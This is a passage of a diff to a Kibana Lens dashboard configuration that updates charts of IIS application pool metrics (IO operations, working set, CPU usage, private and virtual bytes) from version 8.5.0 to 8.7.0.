"7f6e3ead-3933-4202-8b47-73e7a4c46c60": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.application_pool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "35c13f71-7863-401d-8da0-e13af7226004", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.application_pool.name" - }, - "80ebd176-a8e8-489f-b226-55952da7c11e": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - 
"scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "iis.application_pool.process.io_write_operations_per_sec" + }, + "7f6e3ead-3933-4202-8b47-73e7a4c46c60": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.application_pool.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "35c13f71-7863-401d-8da0-e13af7226004", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "35c13f71-7863-401d-8da0-e13af7226004" - ], - "layerId": "9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "7f6e3ead-3933-4202-8b47-73e7a4c46c60", - "xAccessor": "80ebd176-a8e8-489f-b226-55952da7c11e", - "yConfig": [ - { - "axisMode": "left", - "color": "#68bc00", - "forAccessor": "35c13f71-7863-401d-8da0-e13af7226004" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": true, - "xTitle": "", - "yTitle": "" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.application_pool.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "80ebd176-a8e8-489f-b226-55952da7c11e": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": 
true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 15, - "i": "a7ca9003-7450-4fa8-b26b-58cdaa3a8b5f", - "w": 24, - "x": 0, - "y": 11 + "layers": [ + { + "accessors": [ + "35c13f71-7863-401d-8da0-e13af7226004" + ], + "layerId": "9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "7f6e3ead-3933-4202-8b47-73e7a4c46c60", + "xAccessor": "80ebd176-a8e8-489f-b226-55952da7c11e", + "yConfig": [ + { + "axisMode": "left", + "color": "#68bc00", + "forAccessor": "35c13f71-7863-401d-8da0-e13af7226004" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": true }, - "panelIndex": "a7ca9003-7450-4fa8-b26b-58cdaa3a8b5f", - "title": "IO Write Operations", - "type": "lens", - "version": "8.5.0" + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true, + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "IO Write Operations" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "7f2ff86d-01f8-429f-8ff7-8d33db2b2c8e", + "w": 24, + "x": 24, + "y": 11 + }, + "panelIndex": "7f2ff86d-01f8-429f-8ff7-8d33db2b2c8e", + 
"embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "9bed596b-4a6f-43ba-b9ea-6f229e076aef": { + "columnOrder": [ + "7f6e3ead-3933-4202-8b47-73e7a4c46c60", + "80ebd176-a8e8-489f-b226-55952da7c11e", + "35c13f71-7863-401d-8da0-e13af7226004" + ], + "columns": { + "35c13f71-7863-401d-8da0-e13af7226004": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "IO Read Operations/s", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "/s" + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "9bed596b-4a6f-43ba-b9ea-6f229e076aef": { - "columnOrder": [ - "7f6e3ead-3933-4202-8b47-73e7a4c46c60", - "80ebd176-a8e8-489f-b226-55952da7c11e", - "35c13f71-7863-401d-8da0-e13af7226004" - ], - "columns": { - "35c13f71-7863-401d-8da0-e13af7226004": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "IO Read Operations/s", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "iis.application_pool.process.io_read_operations_per_sec" - }, - "7f6e3ead-3933-4202-8b47-73e7a4c46c60": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.application_pool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "35c13f71-7863-401d-8da0-e13af7226004", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": 
"iis.application_pool.name" - }, - "80ebd176-a8e8-489f-b226-55952da7c11e": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "iis.application_pool.process.io_read_operations_per_sec" + }, + "7f6e3ead-3933-4202-8b47-73e7a4c46c60": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.application_pool.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "35c13f71-7863-401d-8da0-e13af7226004", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "35c13f71-7863-401d-8da0-e13af7226004" - ], - "layerId": "9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "7f6e3ead-3933-4202-8b47-73e7a4c46c60", - "xAccessor": "80ebd176-a8e8-489f-b226-55952da7c11e", - "yConfig": [ - { - "axisMode": "left", - "color": "#68bc00", - "forAccessor": "35c13f71-7863-401d-8da0-e13af7226004" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": true, - "xTitle": "", - "yTitle": "" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.application_pool.name" }, - "title": "", - "type": 
"lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "80ebd176-a8e8-489f-b226-55952da7c11e": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "35c13f71-7863-401d-8da0-e13af7226004" + ], + "layerId": "9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "7f6e3ead-3933-4202-8b47-73e7a4c46c60", + "xAccessor": "80ebd176-a8e8-489f-b226-55952da7c11e", + "yConfig": [ + { + "axisMode": "left", + "color": "#68bc00", + "forAccessor": "35c13f71-7863-401d-8da0-e13af7226004" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": true }, - "gridData": { - "h": 15, - "i": "7f2ff86d-01f8-429f-8ff7-8d33db2b2c8e", - "w": 24, - "x": 24, - "y": 11 + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "7f2ff86d-01f8-429f-8ff7-8d33db2b2c8e", - "title": "IO Read Operations", - "type": "lens", - "version": "8.5.0" + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true, + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": 
false, + "type": "lens" + }, + "title": "IO Read Operations" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "50b288bd-2146-4adf-9afa-85b2b3ee21be", + "w": 24, + "x": 0, + "y": 26 + }, + "panelIndex": "50b288bd-2146-4adf-9afa-85b2b3ee21be", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "9bed596b-4a6f-43ba-b9ea-6f229e076aef": { + "columnOrder": [ + "7f6e3ead-3933-4202-8b47-73e7a4c46c60", + "80ebd176-a8e8-489f-b226-55952da7c11e", + "35c13f71-7863-401d-8da0-e13af7226004" + ], + "columns": { + "35c13f71-7863-401d-8da0-e13af7226004": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Working Set", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "9bed596b-4a6f-43ba-b9ea-6f229e076aef": { - "columnOrder": [ - "7f6e3ead-3933-4202-8b47-73e7a4c46c60", - "80ebd176-a8e8-489f-b226-55952da7c11e", - "35c13f71-7863-401d-8da0-e13af7226004" - ], - "columns": { - "35c13f71-7863-401d-8da0-e13af7226004": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Working Set", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.application_pool.process.working_set" - }, - "7f6e3ead-3933-4202-8b47-73e7a4c46c60": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.application_pool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": 
"35c13f71-7863-401d-8da0-e13af7226004", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.application_pool.name" - }, - "80ebd176-a8e8-489f-b226-55952da7c11e": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "iis.application_pool.process.working_set" + }, + "7f6e3ead-3933-4202-8b47-73e7a4c46c60": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.application_pool.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "35c13f71-7863-401d-8da0-e13af7226004", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "35c13f71-7863-401d-8da0-e13af7226004" - ], - "layerId": "9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "7f6e3ead-3933-4202-8b47-73e7a4c46c60", - "xAccessor": "80ebd176-a8e8-489f-b226-55952da7c11e", - "yConfig": [ - { - "axisMode": "left", - "color": "#68bc00", - "forAccessor": "35c13f71-7863-401d-8da0-e13af7226004" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "title": "Empty XY chart", 
- "valueLabels": "hide", - "valuesInLegend": true, - "xTitle": "", - "yTitle": "" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.application_pool.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "80ebd176-a8e8-489f-b226-55952da7c11e": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 15, - "i": "50b288bd-2146-4adf-9afa-85b2b3ee21be", - "w": 24, - "x": 0, - "y": 26 + "layers": [ + { + "accessors": [ + "35c13f71-7863-401d-8da0-e13af7226004" + ], + "layerId": "9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "7f6e3ead-3933-4202-8b47-73e7a4c46c60", + "xAccessor": "80ebd176-a8e8-489f-b226-55952da7c11e", + "yConfig": [ + { + "axisMode": "left", + "color": "#68bc00", + "forAccessor": "35c13f71-7863-401d-8da0-e13af7226004" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": true }, - "panelIndex": "50b288bd-2146-4adf-9afa-85b2b3ee21be", - "title": "Working Set", - "type": "lens", - "version": "8.5.0" + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true, + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": 
"indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Working Set" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "b76b8a0e-e0fc-4095-bc82-0fa429e28ee8", + "w": 24, + "x": 24, + "y": 26 + }, + "panelIndex": "b76b8a0e-e0fc-4095-bc82-0fa429e28ee8", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "9bed596b-4a6f-43ba-b9ea-6f229e076aef": { + "columnOrder": [ + "7f6e3ead-3933-4202-8b47-73e7a4c46c60", + "80ebd176-a8e8-489f-b226-55952da7c11e", + "35c13f71-7863-401d-8da0-e13af7226004" + ], + "columns": { + "35c13f71-7863-401d-8da0-e13af7226004": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "CPU Usage", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "percent", + "params": { + "decimals": 1 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "9bed596b-4a6f-43ba-b9ea-6f229e076aef": { - "columnOrder": [ - "7f6e3ead-3933-4202-8b47-73e7a4c46c60", - "80ebd176-a8e8-489f-b226-55952da7c11e", - "35c13f71-7863-401d-8da0-e13af7226004" - ], - "columns": { - "35c13f71-7863-401d-8da0-e13af7226004": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "CPU Usage", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "percent", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.application_pool.process.cpu_usage_perc" - }, - "7f6e3ead-3933-4202-8b47-73e7a4c46c60": { - "dataType": "string", - 
"isBucketed": true, - "label": "Top 10 values of iis.application_pool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "35c13f71-7863-401d-8da0-e13af7226004", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.application_pool.name" - }, - "80ebd176-a8e8-489f-b226-55952da7c11e": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "iis.application_pool.process.cpu_usage_perc" + }, + "7f6e3ead-3933-4202-8b47-73e7a4c46c60": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.application_pool.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "35c13f71-7863-401d-8da0-e13af7226004", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "35c13f71-7863-401d-8da0-e13af7226004" - ], - "layerId": "9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "7f6e3ead-3933-4202-8b47-73e7a4c46c60", - "xAccessor": "80ebd176-a8e8-489f-b226-55952da7c11e", - "yConfig": [ - { - "axisMode": "left", - "color": "#68bc00", - "forAccessor": "35c13f71-7863-401d-8da0-e13af7226004" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right", - 
"showSingleSeries": true - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": true, - "xTitle": "", - "yTitle": "" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.application_pool.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "80ebd176-a8e8-489f-b226-55952da7c11e": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "35c13f71-7863-401d-8da0-e13af7226004" + ], + "layerId": "9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "7f6e3ead-3933-4202-8b47-73e7a4c46c60", + "xAccessor": "80ebd176-a8e8-489f-b226-55952da7c11e", + "yConfig": [ + { + "axisMode": "left", + "color": "#68bc00", + "forAccessor": "35c13f71-7863-401d-8da0-e13af7226004" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": true }, - "gridData": { - "h": 15, - "i": "b76b8a0e-e0fc-4095-bc82-0fa429e28ee8", - "w": 24, - "x": 24, - "y": 26 + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "b76b8a0e-e0fc-4095-bc82-0fa429e28ee8", - "title": "CPU Usage", - "type": "lens", - "version": "8.5.0" + "title": "Empty XY chart", + "valueLabels": "hide", + 
"valuesInLegend": true, + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "CPU Usage" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "cfb96343-c92d-425c-b36c-5153bd4b05e8", + "w": 24, + "x": 0, + "y": 41 + }, + "panelIndex": "cfb96343-c92d-425c-b36c-5153bd4b05e8", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "9bed596b-4a6f-43ba-b9ea-6f229e076aef": { + "columnOrder": [ + "7f6e3ead-3933-4202-8b47-73e7a4c46c60", + "80ebd176-a8e8-489f-b226-55952da7c11e", + "35c13f71-7863-401d-8da0-e13af7226004" + ], + "columns": { + "35c13f71-7863-401d-8da0-e13af7226004": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Private Bytes", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "9bed596b-4a6f-43ba-b9ea-6f229e076aef": { - "columnOrder": [ - "7f6e3ead-3933-4202-8b47-73e7a4c46c60", - "80ebd176-a8e8-489f-b226-55952da7c11e", - "35c13f71-7863-401d-8da0-e13af7226004" - ], - "columns": { - "35c13f71-7863-401d-8da0-e13af7226004": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Private Bytes", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - } - 
}, - "scale": "ratio", - "sourceField": "iis.application_pool.process.private_bytes" - }, - "7f6e3ead-3933-4202-8b47-73e7a4c46c60": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.application_pool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "35c13f71-7863-401d-8da0-e13af7226004", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.application_pool.name" - }, - "80ebd176-a8e8-489f-b226-55952da7c11e": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "iis.application_pool.process.private_bytes" + }, + "7f6e3ead-3933-4202-8b47-73e7a4c46c60": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.application_pool.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "35c13f71-7863-401d-8da0-e13af7226004", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "35c13f71-7863-401d-8da0-e13af7226004" - ], - "layerId": "9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "7f6e3ead-3933-4202-8b47-73e7a4c46c60", - "xAccessor": "80ebd176-a8e8-489f-b226-55952da7c11e", - "yConfig": [ - { - "axisMode": "left", 
- "color": "#68bc00", - "forAccessor": "35c13f71-7863-401d-8da0-e13af7226004" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": true, - "xTitle": "", - "yTitle": "" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.application_pool.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "80ebd176-a8e8-489f-b226-55952da7c11e": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 15, - "i": "cfb96343-c92d-425c-b36c-5153bd4b05e8", - "w": 24, - "x": 0, - "y": 41 + "layers": [ + { + "accessors": [ + "35c13f71-7863-401d-8da0-e13af7226004" + ], + "layerId": "9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "7f6e3ead-3933-4202-8b47-73e7a4c46c60", + "xAccessor": "80ebd176-a8e8-489f-b226-55952da7c11e", + "yConfig": [ + { + "axisMode": "left", + "color": "#68bc00", + "forAccessor": "35c13f71-7863-401d-8da0-e13af7226004" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": true }, - "panelIndex": "cfb96343-c92d-425c-b36c-5153bd4b05e8", - "title": "Private Bytes", - "type": "lens", - "version": "8.5.0" + 
"preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true, + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Private Bytes" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "941273c3-2e8f-4b44-9701-a52fb0f2e221", + "w": 24, + "x": 24, + "y": 41 + }, + "panelIndex": "941273c3-2e8f-4b44-9701-a52fb0f2e221", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "9bed596b-4a6f-43ba-b9ea-6f229e076aef": { + "columnOrder": [ + "7f6e3ead-3933-4202-8b47-73e7a4c46c60", + "80ebd176-a8e8-489f-b226-55952da7c11e", + "35c13f71-7863-401d-8da0-e13af7226004" + ], + "columns": { + "35c13f71-7863-401d-8da0-e13af7226004": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Virtual Bytes", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } } - ], - "state": { - "adHocDataViews": {}, - 